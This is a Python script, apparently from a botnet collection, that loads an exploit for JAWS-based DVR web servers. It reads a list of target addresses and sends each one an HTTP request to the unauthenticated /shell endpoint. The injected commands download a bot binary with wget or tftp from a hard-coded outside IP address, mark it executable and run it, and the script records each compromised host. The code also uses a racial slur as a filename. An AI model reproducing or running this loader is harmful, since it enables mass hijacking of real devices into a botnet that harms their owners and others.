Path: blob/master/Botnets/Exploits/JAWS/jaws_loader.py
5038 views
#Jaws Exploit Loader1import random, socket, time, sys, requests, re, os2from multiprocessing import Process34if len(sys.argv) < 2:5sys.exit("usage: python %s <input list> <port>" % (sys.argv[0]))67bin_names = ["ARM7", "ARM4"]8list = open(sys.argv[1], "r").readlines()9port = sys.argv[2]1011def send_payload(target):12for names in bin_names:13print "[JAWS/1.0] attempting to infect %s with bin %s" % (target, names)14url = "http://" + target + ":" + port + "/shell?cd /tmp; echo >NiGGeR || cd /var; echo >NiGGeR; cp /bin/busybox yeet; >yeet; chmod 777 yeet; nohup wget http:/\/209.66.128.162:80/%s -O yeet || nohup tftp -r %s -g 209.66.128.162 -l yeet; chmod 777 yeet;./yeet; rm -rf yeeter >/dev/null 2>&1" % (names, names)15try:16output = requests.get(url, timeout=3)17if output.status_code == int('200'):18print "[JAWS/1.0] infected %s" % (target)19file_h = open("jaws_infected.txt", "a+")20file_h.write(target + "\n")21file_h.close()22break23except:24pass2526for i in open(sys.argv[1]).readlines():27try:28i = i.strip("\r\n")29t = Process(target=send_payload, args=(i,))30t.start()31except KeyboardInterrupt:32os.kill(os.getpid(), 9)33except:34pass3536